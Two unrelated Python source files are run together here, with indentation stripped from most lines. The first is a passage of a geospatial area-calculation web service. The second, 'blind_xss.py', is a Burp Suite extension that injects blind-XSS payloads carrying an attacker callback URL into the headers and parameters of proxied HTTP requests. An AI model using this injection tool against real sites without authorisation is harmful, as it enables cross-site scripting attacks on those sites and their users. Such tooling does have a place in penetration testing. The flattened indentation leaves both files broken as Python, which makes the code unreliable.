geometry = extractPolygons(getShapelyGeometry(feature))
if not geometry :
area_data["total_area"] = 0
return result
    #before calculating the area, validate the polygon first.
    #if the polygon is invalid, record the message in the returned status
valid,msg = geometry.check_valid
if not valid:
status["invalid"] = msg
geometry_aea = transform(geometry,target_proj='aea')
try:
area_data["total_area"] = getGeometryArea(geometry_aea,unit,'aea')
except:
traceback.print_exc()
if "invalid" in status:
status["failed"] = "Calculate total area failed.{}".format("\r\n".join(status["invalid"]))
else:
status["failed"] = "Calculate total area failed.{}".format(traceback.format_exception_only(sys.exc_type,sys.exc_value))
return result
if not layers:
return result
if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG:
#export geometry for debug
properties = feature["properties"]
properties.update({"area":area_data["total_area"]})
exportGeojson((geometry_aea,properties),"/tmp/feature.geojson")
for layer in layers:
if "layerid" not in layer and "id" not in layer:
raise Exception("Both 'id' and 'layerid' are missing in layer declaration")
elif "layerid" not in layer:
layer["layerid"] = layer["id"]
elif "id" not in layer:
layer["id"] = layer["layerid"]
if not layer.get("kmiservice"):
layer["kmiservice"] = settings.KMI_SERVER
area_data["layers"] = {}
areas_map = {} if merge_result else None
for layer in layers:
try:
layer_area_data = []
total_layer_area = 0
area_data["layers"][layer["id"]] = {"areas":layer_area_data}
if layer.get('cqlfilter'):
layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=BBOX({},{},{},{},{}) AND {}".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2],layer['cqlfilter'])
else:
layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{}".format(layer["kmiservice"],layer["layerid"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2])
#print(layer_url)
layer_features = retrieveFeatures(layer_url,session_cookies)["features"]
if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG:
#export intersected areas for debug
intersected_features = []
intersected_layer_features = []
for layer_feature in layer_features:
layer_geometry = getShapelyGeometry(layer_feature)
if not layer_geometry.is_valid:
layer_geometry = layer_geometry.buffer(0) #Times out if reserves is a single massive poly
# return {"status":"failed","data":"invalid polygon in tenure layer, probably the other_tenures layer"}
layer_geometry = transform(layer_geometry,target_proj='aea')
if not isinstance(layer_geometry,Polygon) and not isinstance(layer_geometry,MultiPolygon):
continue
intersections = extractPolygons(geometry_aea.intersection(layer_geometry))
if not intersections:
continue
layer_feature_area_data = None
#try to get the area data from map
if merge_result:
area_key = []
for key,value in layer["properties"].iteritems():
area_key.append(layer_feature["properties"][value])
area_key = tuple(area_key)
layer_feature_area_data = areas_map.get(area_key)
if not layer_feature_area_data:
#map is not enabled,or data does not exist in map,create a new one
layer_feature_area_data = {"area":0}
for key,value in layer["properties"].iteritems():
layer_feature_area_data[key] = layer_feature["properties"][value]
layer_area_data.append(layer_feature_area_data)
if merge_result:
#save it into map
areas_map[area_key] = layer_feature_area_data
feature_area = getGeometryArea(intersections,unit,src_proj='aea')
layer_feature_area_data["area"] += feature_area
total_layer_area += feature_area
if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG:
#export intersected areas for debug
properties = layer_feature["properties"]
properties.update({"area":feature_area})
intersected_features.append((intersections,properties))
intersected_layer_features.append((layer_geometry,properties))
if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG:
#export intersected areas for debug
if intersected_features:
for feat in intersected_features:
feat[1].update({"total_area":total_layer_area})
exportGeojson(intersected_features,'/tmp/feature_area_{}_intersection.geojson'.format(layer["id"]))
exportGeojson(intersected_layer_features,'/tmp/feature_area_{}.geojson'.format(layer["id"]))
area_data["layers"][layer["id"]]["total_area"] = total_layer_area
total_area += total_layer_area
if not overlap and total_area >= area_data["total_area"] :
break
except:
traceback.print_exc()
status["failed"] = "Calculate intersection area between fire boundary and layer '{}' failed.{}".format(layer["layerid"] or layer["id"],traceback.format_exception_only(sys.exc_type,sys.exc_value))
break
if "failed" in status:
        #calculating the area failed
return result
if not overlap :
area_data["other_area"] = area_data["total_area"] - total_area
if area_data["other_area"] < -0.01: #tiny difference is allowed.
            #some layers overlap
if not settings.CHECK_OVERLAP_IF_CALCULATE_AREA_FAILED:
status["overlapped"] = "The sum({0}) of the burning areas in individual layers are ({2}) greater than the total burning area({1}).\r\n The features from layers({3}) are overlaped, please check.".format(round(total_area,2),round(area_data["total_area"],2),round(math.fabs(area_data["other_area"]),2),", ".join([layer["id"] for layer in layers]))
else:
filename = "/tmp/overlap_{}.log".format(feature["properties"].get("id","feature"))
status["overlapped"] = "Features from layers are overlaped,please check the log file in server side '{}'".format(filename)
if run_in_other_process:
result["overlap_logfile"] = filename
else:
checkOverlap(session_cookies,feature,options,filename)
return result
def layermetadata(layer):
if not layer.get("_layermetadata"):
layer["_layermetadata"] = kmi.get_layermetadata(layer["layerid"],kmiserver=layer["kmiservice"])
return layer["_layermetadata"]
def layerdefinition(layer):
if not layer.get("_layerdefinition"):
layerdefinition = kmi.get_layerdefinition(layer["layerid"],kmiserver=layer["kmiservice"])
layer["_layerdefinition"] = layerdefinition
else:
layerdefinition = layer["_layerdefinition"]
if not layerdefinition["geometry_property"]:
if layerdefinition["geometry_property_msg"]:
raise Exception(layerdefinition["geometry_property_msg"])
elif not layerdefinition["geometry_properties"]:
raise Exception("The layer '{}' is not a spatial layer".format(layer["layerid"]))
else:
raise Exception("Failed to identify the geometry property of the layer '{}'".format(layer["layerid"]))
return layerdefinition
def getFeature(feature,session_cookies,options):
"""
options:{
format: properties or geojson//optional default is properties
action: getFeature or getIntersectedFeatures or getClosestFeature
layers:[
{
id: //if missing, use 'layerid' as id
layerid: //layerid in kmi, in most cases, layerid is equal with id, if missing, use 'id' as layerid
            kmiservice: //optional,
properties:{ //optional
name:column in dataset
}
},
...
]
}
getFeature result:[
{
id:
layer:
failed: message if failed; otherwise is null
properties: {
name:value
}
},
]
"""
# needs gdal 1.10+
layers = options["layers"]
#check whether layers is not empty
if not layers:
raise Exception("Layers must not be empty.")
#check whether layers is list
if not isinstance(layers,(list,tuple)):
raise Exception("Layers must be list type.")
#layers must be list of layers
if not isinstance(layers,(list,tuple)):
layers = [layers]
for layer in layers:
if "layerid" not in layer and "id" not in layer:
raise Exception("Both 'id' and 'layerid' are missing in layer declaration")
elif "layerid" not in layer:
layer["layerid"] = layer["id"]
elif "id" not in layer:
layer["id"] = layer["layerid"]
if not layer.get("kmiservice"):
layer["kmiservice"] = settings.KMI_SERVER
get_feature_data = {"id":None,"layer":None,"failed":None}
geometry = getShapelyGeometry(feature)
try:
for layer in layers:
if not layer or not layer.get("kmiservice") or not layer["layerid"]:
continue
if layer.get('check_bbox'):
#check whether feature is in layer's bbox
layer_bbox = layermetadata(layer).get("latlonBoundingBox_EPSG:4326") or layermetadata(layer).get("latlonBoundingBox")
if not layer_bbox:
get_feature_data["failed"] = "Can't find layer({})'s bounding box for epsg:4326".format(layer["layerid"])
break
#buffered_bbox is lonlatboundingbox
if layer.get("buffer") and isinstance(geometry,Point):
checking_bbox = Polygon(buffer(geometry.x,geometry.y,layer["buffer"][-1] if isinstance(layer["buffer"],(list,tuple)) else layer["buffer"],resolution=1)).bounds
else:
checking_bbox = geometry.bounds
if checking_bbox[2] < layer_bbox[1] or checking_bbox[0] > layer_bbox[3] or checking_bbox[3] < layer_bbox[0] or checking_bbox[1] > layer_bbox[2]:
#not in this layer's bounding box
continue
if options["action"] == "getFeature":
get_feature_data["feature"] = None
if isinstance(geometry,Point):
if layerdefinition(layer)["geometry_type"] in ["point",'multipoint']:
get_feature_data["failed"] = "The {1} layer '{0}' doesn't support action '{2}'. ".format(layer["layerid"],layerdefinition(layer)["geometry_property"]["localType"],options["action"])
break
else:
#polygon or line
layer_features = retrieveFeatures(
"{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=CONTAINS({},POINT({} {}))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.y,geometry.x),
session_cookies
)["features"]
else:
get_feature_data["failed"] = "Action '{}' Only support Point geometry.".format(options["action"])
break
elif options["action"] == "getIntersectedFeatures":
get_feature_data["features"] = None
if isinstance(geometry,Point):
if not layer.get("buffer"):
get_feature_data["failed"] = "'buffer' is missing in layer '{}'".format(layer["id"])
break
buff_polygon = Polygon(buffer(geometry.x,geometry.y,layer["buffer"]))
layer_features = retrieveFeatures(
"{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=INTERSECTS({},POLYGON(({})))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],"%2C".join(["{} {}".format(coord[0],coord[1]) for coord in list(buff_polygon.exterior.coords)])),
session_cookies
)["features"]
elif isinstance(geometry,Polygon):
layer_features = retrieveFeatures(
"{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=INTERSECTS({},POLYGON(({})))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],"%2C".join(["{} {}".format(coord[0],coord[1]) for coord in list(geometry.exterior.coords)])),
session_cookies
)["features"]
else:
get_feature_data["failed"] = "Action '{}' Only support Point and Polygon geometry.".format(options["action"])
break
elif options["action"] == "getClosestFeature":
get_feature_data["feature"] = None
layer_feature = None
if not isinstance(geometry,Point):
get_feature_data["failed"] = "Action '{}' Only support Point geometry.".format(options["action"])
break
                #try to get the grid data with the smallest buffer first; if nothing is found, the grid data stays null.
for buff in layer["buffer"] if isinstance(layer["buffer"],(list,tuple)) else [layer["buffer"]]:
buff_bbox = Polygon(buffer(geometry.x,geometry.y,buff)).bounds
layer_features = retrieveFeatures(
"{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{},urn:ogc:def:crs:EPSG:4326".format(layer["kmiservice"],layer["layerid"],buff_bbox[1],buff_bbox[0],buff_bbox[3],buff_bbox[2]),
session_cookies
)["features"]
if len(layer_features) == 1:
layer_feature = layer_features[0]
break
elif len(layer_features) > 1:
layer_feature = None
minDistance = None
for feat in layer_features:
if layer_feature is None:
layer_feature = feat
minDistance = getDistance(geometry,shape(feat["geometry"]),p2_proj=layermetadata(layer).get('srs') or "EPSG:4326")
else:
distance = getDistance(geometry,shape(feat["geometry"]),p2_proj=layermetadata(layer).get('srs') or "EPSG:4326")
if minDistance > distance:
minDistance = distance
layer_feature = feat
break
if layer_feature:
layer_features = [layer_feature]
else:
get_feature_data["failed"] = "Action '{}' Not Support".format(options["action"])
break
if layer_features:
if "feature" in get_feature_data and len(layer_features) > 1:
get_feature_data["failed"] = "Found {1} features in layer '{0}' ".format(layer["layerid"],len(layer_features))
break
if layer_features:
get_feature_data["id"] = layer["id"]
get_feature_data["layer"] = layer["layerid"]
for layer_feature in layer_features:
feat = {}
if layer.get("properties"):
for name,column in layer["properties"].iteritems():
feat[name] = layer_feature["properties"][column]
else:
for key,value in layer_feature["properties"].iteritems():
feat[key] = value
if options.get("format") == "geojson":
#return geojson
layer_feature["properties"] = feat
feat = layer_feature
if "feature" in get_feature_data:
get_feature_data["feature"] = feat
elif "features" in get_feature_data:
if get_feature_data["features"]:
get_feature_data["features"].append(feat)
else:
get_feature_data["features"] = [feat]
break
except:
traceback.print_exc()
get_feature_data["failed"] = "{} from layers ({}) failed.{}".format(options["action"],layers,traceback.format_exception_only(sys.exc_type,sys.exc_value))
return get_feature_data
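# Hedged example of an options dict for getFeature() above; the layer id, buffer distances
# and property mapping are illustrative values only, not a real KMI layer. It asks for the
# closest feature to a point, trying a 1 km bounding box first and falling back to 10 km.
EXAMPLE_GETFEATURE_OPTIONS = {
    "action": "getClosestFeature",
    "format": "properties",
    "layers": [
        {"id": "weather_stations", "buffer": [1000, 10000],
         "properties": {"station_name": "name"}},
    ],
}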
def spatial():
# needs gdal 1.10+
try:
features = json.loads(bottle.request.forms.get("features"))
options = bottle.request.forms.get("options")
if options:
options = json.loads(options)
else:
options = {}
cookies = settings.get_session_cookie()
results = []
features = features["features"] or []
index = 0
while index < len(features):
feature = features[index]
index += 1
feature_result = {}
results.append(feature_result)
for key,val in options.iteritems():
if "action" not in val:
val["action"] = key
if val["action"] == "getArea":
feature_result[key] = calculateArea(feature,cookies,val)
else:
feature_result[key] = getFeature(feature,cookies,val)
bottle.response.set_header("Content-Type", "application/json")
#print("{}:return response to client.{}".format(datetime.now(),results))
return {"total_features": len(results), "features": results}
except:
if bottle.response.status < 400 :
bottle.response.status = 400
bottle.response.set_header("Content-Type", "text/plain")
traceback.print_exc()
return traceback.format_exception_only(sys.exc_type,sys.exc_value)
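# Hedged client sketch; the endpoint URL is an assumption (the route registration is not shown
# in this module). spatial() above reads two form fields, "features" (a GeoJSON
# FeatureCollection) and "options" (a dict of named actions), and returns one result entry per
# feature.
#   payload = {
#       "features": json.dumps({"type": "FeatureCollection", "features": [some_feature]}),
#       "options": json.dumps({"area": {"action": "getArea", "layers": [],
#                                       "unit": "ha", "layer_overlap": False}}),
#   }
#   requests.post("https://example.test/spatial", data=payload).json()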
|
blind_xss.py
|
from burp import IBurpExtender, IScannerCheck
from burp import ITab
from burp import IHttpListener
from burp import IInterceptedProxyMessage
from burp import IMessageEditorController
from burp import IContextMenuFactory, IContextMenuInvocation
from javax.swing import (JLabel, JTextField, JOptionPane,
JTabbedPane, JPanel, JButton, JMenu, JMenuItem, JTable, JScrollPane,
JCheckBox, BorderFactory, Box, JFileChooser, ListSelectionModel)
from javax.swing.border import EmptyBorder
from java.awt import (GridBagLayout, Dimension, GridBagConstraints,
Color, FlowLayout, BorderLayout, Insets)
from java.net import URL
from javax import swing
from javax.swing.filechooser import FileNameExtensionFilter
from javax.swing.table import AbstractTableModel, DefaultTableModel
from javax.swing.event import TableModelEvent, TableModelListener
from StringIO import StringIO
import os
import re
import threading
import random
import math
from java.lang import Runnable
from threading import Thread
from java.util import ArrayList, Arrays
import config
class MyTableModelListener(TableModelListener):
def __init__(self, table, burp, data_dict, file):
self.table = table
self.burp = burp
self.data_dict = data_dict
self.file = file
def tableChanged(self, e):
if e.getType() == 1:
data = self.table.getDataVector()
value = data[-1][1]
key = data[-1][0]
if key == '':
return
if key[-1] == '\n':
key = key[:-1]
self.data_dict[key] = value
if e.getType() == 0:
for x in self.table.getDataVector():
key = x[0]
val = x[1]
if key == '':
continue
if key[-1] == '\n':
key = key[:-1]
self.data_dict[key] = val
try:
self.data_dict.pop('')
except Exception:
pass
self.burp.saveToFileAsync(self.file, self.data_dict)
if e.getType() == -1:
return
try:
self.data_dict.pop('')
except Exception:
pass
class PyRunnable(Runnable):
"""This class is used to wrap a python callable object into a Java Runnable that is
suitable to be passed to various Java methods that perform callbacks.
"""
def __init__(self, target, *args, **kwargs):
"""Creates a PyRunnable.
target - The callable object that will be called when this is run.
*args - Variable positional arguments
        **kwargs - Variable keyword arguments.
"""
self.target = target
self.args = args
self.kwargs = kwargs
def run(self):
self.target(*self.args, **self.kwargs)
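# Hedged usage sketch, mirroring how appendToResults() further below uses PyRunnable: wrap a
# plain Python callable so Swing runs it on the event-dispatch thread. "some_label" is a
# placeholder Swing component, not something defined in this extension.
#   swing.SwingUtilities.invokeLater(PyRunnable(some_label.setText, "done"))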
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel, IContextMenuFactory, IScannerCheck):
name = "Femida XSS"
_jTabbedPane = JTabbedPane()
_jPanel = JPanel()
_jAboutPanel = JPanel()
_jPanelConstraints = GridBagConstraints()
_jLabelParameters = None
_jTextFieldParameters = None
_jLabelTechniques = None
_jTextFieldURL = None
_jLabelFuzzFactor = None
_jTextFieldFuzzFactor = None
_jLabelAdditionalCmdLine = None
_jTextFieldAdditionalCmdLine = None
_jButtonSetCommandLine = None
_jLabelAbout = None
_overwriteHeader = False
_overwriteParam = False
_forkRequestParam = False
def doActiveScan(self, baseRequestResponse, insertionPoint):
scan_issues = []
try:
requestString = str(baseRequestResponse.getRequest().tostring())
newRequestString = self.prepareRequest(requestString)
vulnerable, verifyingRequestResponse = self.quickCheckScan(newRequestString, baseRequestResponse)
except Exception as msg:
print(msg)
return []
def quickCheckScan(self, preparedRequest, requestResponse):
check = self._callbacks.makeHttpRequest(requestResponse.getHttpService(), self._helpers.stringToBytes(preparedRequest))
vulner = self._helpers.analyzeResponse(check.getResponse()).getStatusCode() == 200
return vulner, check
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
self._callbacks.setExtensionName(self.name)
self._callbacks.registerScannerCheck(self)
self._dictPayloads = {}
self._dictHeaders = {}
self._dictParams = {}
self.status_flag = False
self.jfc = JFileChooser("./")
self.jfc.setDialogTitle("Upload Payloads")
self.jfc.setFileFilter(FileNameExtensionFilter("TXT file", ["txt"]))
self._layout = GridBagLayout()
self._jPanel.setLayout(self._layout)
self._jLabelTechniques = JLabel("Press to start:")
self.createAnyView(self._jLabelTechniques, 0, 0, 3, 1, Insets(0, 0, 10, 0))
self.submitSearchButton = swing.JButton('Run proxy', actionPerformed=self.active_flag)
self.submitSearchButton.setBackground(Color.WHITE)
self.createAnyView(self.submitSearchButton, 3, 0, 6, 1, Insets(0, 0, 10, 0))
self._jPanel.setBounds(0, 0, 1000, 1000)
self._jLabelTechniques = JLabel("Your URL (my.burpcollaborator.net):")
self.createAnyView(self._jLabelTechniques, 0, 1, 3, 1, Insets(0, 0, 10, 0))
self._jTextFieldURL = JTextField("", 30)
self.createAnyView(self._jTextFieldURL, 3, 1, 5, 1, Insets(0, 0, 10, 0))
self._forkRequestButton = swing.JButton('Parallel Request',actionPerformed=self.forkRequest)
self._forkRequestButton.setBackground(Color.WHITE)
self.createAnyView(self._forkRequestButton, 8, 1, 1, 1, Insets(0, 0, 10, 0))
self._tableModelPayloads = DefaultTableModel()
self._tableModelPayloads.addColumn("Payload")
self._tableModelPayloads.addColumn("Using")
self._tableModelHeaders = DefaultTableModel()
self._tableModelHeaders.addColumn("Header")
self._tableModelHeaders.addColumn("Using")
self._tableModelParams = DefaultTableModel()
self._tableModelParams.addColumn("Parameter")
self._tableModelParams.addColumn("Using")
self._payloadTable = self.createAnyTable(self._tableModelPayloads, 1, Dimension(300, 200))
self.createAnyView(self._payloadTable, 0, 2, 3, 1, Insets(0, 0, 0, 10))
self._headerTable = self.createAnyTable(self._tableModelHeaders, 2, Dimension(300, 200))
self.createAnyView(self._headerTable, 3, 2, 3, 1, Insets(0, 0, 0, 10))
self._paramTable = self.createAnyTable(self._tableModelParams, 3, Dimension(300, 200))
self.createAnyView(self._paramTable, 6, 2, 3, 1, Insets(0, 0, 0, 0))
deletePayloadButton = swing.JButton('Delete',actionPerformed=self.deleteToPayload)
deletePayloadButton.setBackground(Color.WHITE)
self.createAnyView(deletePayloadButton, 0, 3, 1, 1, Insets(3, 0, 0, 0))
deletePayloadButton = swing.JButton('Upload',actionPerformed=self.uploadToPayload)
deletePayloadButton.setBackground(Color.WHITE)
self.createAnyView(deletePayloadButton, 1, 3, 1, 1, Insets(3, 0, 0, 0))
addPayloadButton = swing.JButton('Add',actionPerformed=self.addToPayload)
addPayloadButton.setBackground(Color.WHITE)
self.createAnyView(addPayloadButton, 2, 3, 1, 1, Insets(3, 0, 0, 10))
deleteHeaderButton = swing.JButton('Delete',actionPerformed=self.deleteToHeader)
deleteHeaderButton.setBackground(Color.WHITE)
self.createAnyView(deleteHeaderButton, 3, 3, 1, 1, Insets(3, 0, 0, 0))
self._overwriteHeaderButton = swing.JButton('Overwrite',actionPerformed=self.overwriteHeader)
self._overwriteHeaderButton.setBackground(Color.WHITE)
self.createAnyView(self._overwriteHeaderButton, 4, 3, 1, 1, Insets(3, 0, 0, 0))
addHeaderButton = swing.JButton('Add',actionPerformed=self.addToHeader)
addHeaderButton.setBackground(Color.WHITE)
self.createAnyView(addHeaderButton, 5, 3, 1, 1, Insets(3, 0, 0, 10))
deleteParamsButton = swing.JButton('Delete',actionPerformed=self.deleteToParams)
deleteParamsButton.setBackground(Color.WHITE)
self.createAnyView(deleteParamsButton, 6, 3, 1, 1, Insets(3, 0, 0, 0))
self._overwriteParamButton = swing.JButton('Overwrite',actionPerformed=self.overwriteParam)
self._overwriteParamButton.setBackground(Color.WHITE)
self.createAnyView(self._overwriteParamButton, 7, 3, 1, 1, Insets(3, 0, 0, 0))
addParamsButton = swing.JButton('Add',actionPerformed=self.addToParams)
addParamsButton.setBackground(Color.WHITE)
self.createAnyView(addParamsButton, 8, 3, 1, 1, Insets(3, 0, 0, 0))
self._resultsTextArea = swing.JTextArea()
resultsOutput = swing.JScrollPane(self._resultsTextArea)
resultsOutput.setMinimumSize(Dimension(800,200))
self.createAnyView(resultsOutput, 0, 4, 9, 1, Insets(10, 0, 0, 0))
self.clearSearchButton = swing.JButton('Clear Search Output',actionPerformed=self.clearOutput)
self.createAnyView(self.clearSearchButton, 3, 6, 3, 1, Insets(3, 0, 0, 0))
self._callbacks.customizeUiComponent(self._jPanel)
self._callbacks.addSuiteTab(self)
self.starterPack()
self._callbacks.registerHttpListener(self)
self._callbacks.registerContextMenuFactory(self)
return
def createAnyTable(self, table_model, table_number, min_size):
_table = JTable(table_model)
_table.setAutoResizeMode(JTable.AUTO_RESIZE_ALL_COLUMNS)
_scrolltable = JScrollPane(_table)
_scrolltable.setMinimumSize(min_size)
return _scrolltable
def insertAnyTable(self, table, data):
def detectTable(table):
name = table.getColumnName(0)
            if name == 'Payload':
                return 0
            elif name == 'Header':
                return 1
            elif name == 'Parameter':
                return 2
tableNum = detectTable(table)
new_data = [str(x) for x in data]
table.insertRow(table.getRowCount(), new_data)
return table.getRowCount()
def createAnyView(self, _component, gridx, gridy, gridwidth, gridheight, insets):
self._jPanelConstraints.fill = GridBagConstraints.HORIZONTAL
self._jPanelConstraints.gridx = gridx
self._jPanelConstraints.gridy = gridy
self._jPanelConstraints.gridwidth = gridwidth
self._jPanelConstraints.gridheight = gridheight
self._jPanelConstraints.insets = insets
self._jPanel.add(_component, self._jPanelConstraints)
def createMenuItems(self, contextMenuInvocation):
context = contextMenuInvocation.getInvocationContext()
filterMenu = JMenu("Femida XSS")
self._contextMenuData = contextMenuInvocation
if (context == 0 or context == 1 or
context == 2 or context == 3):
filterMenu.add(JMenuItem("Add to Headers", actionPerformed = self.addToHeadersItem))
filterMenu.add(JMenuItem("Add to Parameters", actionPerformed = self.addToParametersItem))
return Arrays.asList(filterMenu)
def addToHeadersItem(self, event):
start, end = self._contextMenuData.getSelectionBounds()
message = self._contextMenuData.getSelectedMessages()[0]
ctx = self._contextMenuData.getInvocationContext()
if ctx == 0 or ctx == 2:
message = message.getRequest()
elif ctx == 1 or ctx == 3:
message = message.getResponse()
else:
print(ctx)
return
try:
selected_text = self._helpers.bytesToString(message)[start:end]
self.insertAnyTable(self._tableModelHeaders, [str(selected_text), '1'])
except Exception:
pass
def addToParametersItem(self, event):
start, end = self._contextMenuData.getSelectionBounds()
message = self._contextMenuData.getSelectedMessages()[0]
ctx = self._contextMenuData.getInvocationContext()
if ctx == 0 or ctx == 2:
message = message.getRequest()
elif ctx == 1 or ctx == 3:
message = message.getResponse()
else:
print(ctx)
return
try:
selected_text = self._helpers.bytesToString(message)[start:end]
self.insertAnyTable(self._tableModelParams, [str(selected_text), '1'])
except Exception:
pass
def starterPack(self):
self.addFromFileAsync(config.Payloads, self._tableModelPayloads)
self.addFromFileAsync(config.Headers, self._tableModelHeaders)
self.addFromFileAsync(config.Parameters, self._tableModelParams)
self._jTextFieldURL.setText(config.Callback_url)
self._tableModelPayloads.addTableModelListener(MyTableModelListener(self._tableModelPayloads, self, self._dictPayloads, config.Payloads))
self._tableModelHeaders.addTableModelListener(MyTableModelListener(self._tableModelHeaders, self, self._dictHeaders, config.Headers))
self._tableModelParams.addTableModelListener(MyTableModelListener(self._tableModelParams, self, self._dictParams, config.Parameters))
def addToPayload(self, button):
self.insertAnyTable(self._tableModelPayloads, ['', '1'])
def addToHeader(self, button):
self.insertAnyTable(self._tableModelHeaders, ['', '1'])
def addToParams(self, button):
self.insertAnyTable(self._tableModelParams, ['', '1'])
def uploadToPayload(self, button):
self._returnFileChooser = self.jfc.showDialog(None, "Open")
if (self._returnFileChooser == JFileChooser.APPROVE_OPTION):
selectedFile = self.jfc.getSelectedFile()
self.fileUpload(selectedFile, self._tableModelPayloads)
def deleteToPayload(self, button):
try:
val = self._tableModelPayloads.getValueAt(self._tableModelPayloads.getRowCount()-1, 0)
self._tableModelPayloads.removeRow(self._tableModelPayloads.getRowCount()-1)
self._dictPayloads.pop(val)
self.saveToFileAsync(config.Payloads, self._dictPayloads)
except Exception as msg:
# print(msg)
pass
def deleteToHeader(self, button):
try:
val = self._tableModelHeaders.getValueAt(self._tableModelHeaders.getRowCount()-1, 0)
self._tableModelHeaders.removeRow(self._tableModelHeaders.getRowCount()-1)
self._dictHeaders.pop(val)
self.saveToFileAsync(config.Headers, self._dictHeaders)
except Exception as msg:
# print(msg)
pass
def deleteToParams(self, button):
try:
val = self._tableModelParams.getValueAt(self._tableModelParams.getRowCount()-1, 0)
self._tableModelParams.removeRow(self._tableModelParams.getRowCount()-1)
self._dictParams.pop(val)
self.saveToFileAsync(config.Parameters, self._dictParams)
except Exception as msg:
# print(msg)
pass
def clearOutput(self, button):
self._resultsTextArea.setText("")
def fileUpload(self, path, table):
with open(str(path), "r") as f:
for line in f:
self.insertAnyTable(table, [str(line), '1'])
def active_flag(self, button):
if not self.status_flag:
self.status_flag = True
self.submitSearchButton.setBackground(Color.GRAY)
self.appendToResults("Proxy start...\n")
else:
self.status_flag = False
self.submitSearchButton.setBackground(Color.WHITE)
self.appendToResults("Proxy stop...\n")
def overwriteHeader(self, button):
if not self._overwriteHeader:
self._overwriteHeader = True
self._overwriteHeaderButton.setBackground(Color.GRAY)
else:
self._overwriteHeader = False
self._overwriteHeaderButton.setBackground(Color.WHITE)
def overwriteParam(self, button):
if not self._overwriteParam:
self._overwriteParam = True
self._overwriteParamButton.setBackground(Color.GRAY)
else:
self._overwriteParam = False
self._overwriteParamButton.setBackground(Color.WHITE)
def forkRequest(self, button):
if not self._forkRequestParam:
self._forkRequestParam = True
self._forkRequestButton.setBackground(Color.GRAY)
else:
self._forkRequestParam = False
self._forkRequestButton.setBackground(Color.WHITE)
def prepareRequest(self, requestString, messageInfo=None):
requestString = str(requestString)
listHeader = re.findall('([\w-]+):\s?(.*)', requestString)
dictRealHeaders = {x[0].lower():x[1] for x in listHeader}
selectedPayloads = {}
for ind, k in enumerate(self._dictPayloads):
if self._dictPayloads[k] == '1':
selectedPayloads[k] = '1'
else:
continue
for index, key in enumerate(self._dictHeaders):
if key.lower() in dictRealHeaders.keys() and self._dictHeaders[key] == '1':
if len(self._dictPayloads.keys()) == 0:
pass
elif self._overwriteHeader:
payload = random.choice(selectedPayloads.keys())
payload = payload.replace(r"{URL}", self._jTextFieldURL.getText(), 1)
requestString = requestString.replace(dictRealHeaders.get(key.lower()), payload, 1)
elif not self._overwriteHeader:
payload = random.choice(selectedPayloads.keys())
payload = payload.replace(r"{URL}", self._jTextFieldURL.getText(), 1)
payload = dictRealHeaders.get(key.lower()) + payload
requestString = requestString.replace(dictRealHeaders.get(key.lower()), payload, 1)
else:
pass
for index, key in enumerate(self._dictParams):
analyzed = self._helpers.analyzeRequest(requestString.encode())
param = analyzed.getParameters()
dictRealParams = {x.getName().lower(): [x.getValue(), x.getValueStart(), x.getValueEnd()] for x in param}
if key.lower() in dictRealParams.keys() and self._dictParams[key] == '1':
if len(self._dictPayloads.keys()) == 0:
pass
elif self._overwriteParam:
payload = random.choice(selectedPayloads.keys())
payload = payload.replace(r"{URL}", self._jTextFieldURL.getText(), 1)
start_word = dictRealParams[key.lower()][1]
end_word = dictRealParams[key.lower()][2]
requestString = requestString[:start_word] + payload + requestString[end_word:]
elif not self._overwriteParam:
payload = random.choice(selectedPayloads.keys())
payload = payload.replace(r"{URL}", self._jTextFieldURL.getText(), 1)
payload = dictRealParams[key.lower()][0] + payload
start_word = dictRealParams[key.lower()][1]
end_word = dictRealParams[key.lower()][2]
requestString = requestString[:start_word] + payload + requestString[end_word:]
else:
pass
return requestString
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
if not self.status_flag:
return
# only process requests
if not messageIsRequest:
return
if self._forkRequestParam:
requestString = messageInfo.getRequest().tostring()
            # Crude workaround: forked requests are tagged with a leading '@' so they are not processed and forked again here; this should be replaced with something cleaner.
if requestString[0] == '@':
messageInfo.setRequest(self._helpers.stringToBytes(requestString[1:]))
else:
newRequestString = self.prepareRequest(requestString, messageInfo)
self.appendToResults('Parallel Request:')
self.appendToResults(newRequestString.encode())
newRequestString = '@' + newRequestString
func = self._callbacks.makeHttpRequest
thread = Thread(target=func, args=(messageInfo.getHttpService(), self._helpers.stringToBytes(newRequestString)))
thread.start()
else:
requestString = messageInfo.getRequest().tostring()
newRequestString = self.prepareRequest(requestString, messageInfo)
self.appendToResults(newRequestString.encode())
messageInfo.setRequest(self._helpers.stringToBytes(newRequestString))
    # Function to append output to the GUI results area
def appendToResults(self, s):
def appendToResults_run(s):
self._resultsTextArea.append(s)
self._resultsTextArea.append('\n')
swing.SwingUtilities.invokeLater(PyRunnable(appendToResults_run, str(s)))
def addFromFileAsync(self, file, table):
def addFromFile_run(file, table):
if os.path.exists(file):
with open(file, 'r') as f:
for row in f.readlines():
if row != '':
temp = row[:-1] if row[-1] == '\n' else row
self.insertAnyTable(table, [str(temp), '1'])
swing.SwingUtilities.invokeLater(PyRunnable(addFromFile_run, file, table))
